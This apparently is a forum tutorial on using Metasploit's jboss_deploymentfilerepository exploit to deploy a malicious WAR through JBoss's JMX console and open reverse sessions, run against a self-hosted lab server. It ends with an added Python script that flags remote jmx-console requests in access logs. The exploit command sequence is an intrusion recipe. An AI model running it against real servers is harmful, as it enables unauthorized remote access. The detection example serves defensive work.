Hi everybody!
Today I'll show you how to use Metasploit against the JBoss application server.
In this tutorial I'll deploy a fake WAR file as the payload through the JMX console in JBoss and gain access to the server's file system.
This tutorial uses the following software:
1. JBoss_4_2_2_GA -- can be downloaded free from the JBoss site.
2. Metasploit 5, using the jboss_deploymentfilerepository module.
Steps for JBoss:
1. Download JBoss_4_2_2_GA.zip for this tutorial (you can use any other JBoss version).
2. unzip jboss-4.2.2.GA.zip
3. ./run.sh (if you want to supply a different IP than 127.0.0.1, use ./run.sh -b [JBoss's ip])
Steps for Metasploit :)
1. search jboss
2. use exploit/multi/http/jboss_deploymentfilerepository
3. show options
4. set RHOST [JBoss's ip]
5. set LHOST [machine's ip]
6. set LPORT 8888 (or any other port)
7. exploit -- before running the exploit, let's look at the jmx-console in the browser....
We now see that 4 (actually 5 :)) sessions have been opened on our target....
We can also go to the JBoss directory and see the upload.... (in the tmp folder, because we already deleted it from the deploy folder)
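From the defender's side, the jmx-console requests this walkthrough relies on show up in HTTP access logs. The following is an added example, not part of the original post or of Metasploit: it flags requests to /jmx-console/ from non-loopback clients. It assumes Common Log Format access logs; the sample lines, the function names classify and scan, and the severity labels are constructed for illustration.

```python
import ipaddress
import re

# Assumed log format: Common Log Format (client - user [time] "request" status size).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Mar/2020:09:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 51234
192.0.2.15 - - [10/Mar/2020:09:14:22 +0000] "GET /jmx-console/ HTTP/1.1" 200 51234
192.0.2.15 - - [10/Mar/2020:09:14:25 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1830
198.51.100.7 - - [10/Mar/2020:09:20:00 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.9 - - [10/Mar/2020:09:31:40 +0000] "HEAD /jmx-console/HtmlAdaptor HTTP/1.1" 401 0
"""

def classify(line, trusted=("127.0.0.0/8", "::1/128")):
    """Return a finding dict for a remote jmx-console request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or unrelated line
    path = m["path"].split("?", 1)[0].lower()
    if not (path == "/jmx-console" or path.startswith("/jmx-console/")):
        return None
    try:
        client = ipaddress.ip_address(m["client"])
    except ValueError:
        return None  # hostname instead of an address: out of scope here
    if any(client in ipaddress.ip_network(n) for n in trusted):
        return None  # local or explicitly trusted admin network
    status = int(m["status"])
    if status >= 400:
        severity = "info"    # request rejected or not served
    elif path.startswith("/jmx-console/htmladaptor"):
        severity = "high"    # MBean operation endpoint answered a remote client
    else:
        severity = "medium"  # console pages served to a remote client
    return {"client": str(client), "time": m["time"], "method": m["method"],
            "path": m["path"], "status": status, "severity": severity}

def scan(log_text, trusted=("127.0.0.0/8", "::1/128")):
    """Classify every line and return the findings in log order."""
    hits = (classify(line, trusted) for line in log_text.splitlines())
    return [h for h in hits if h]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:15} {f['method']} {f['path']} -> {f['status']}")
```

Any "medium" or "high" finding means the console is answering unauthenticated requests from the network and should be restricted or removed from the deployment.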
Enjoy ;-)...
The fisherman...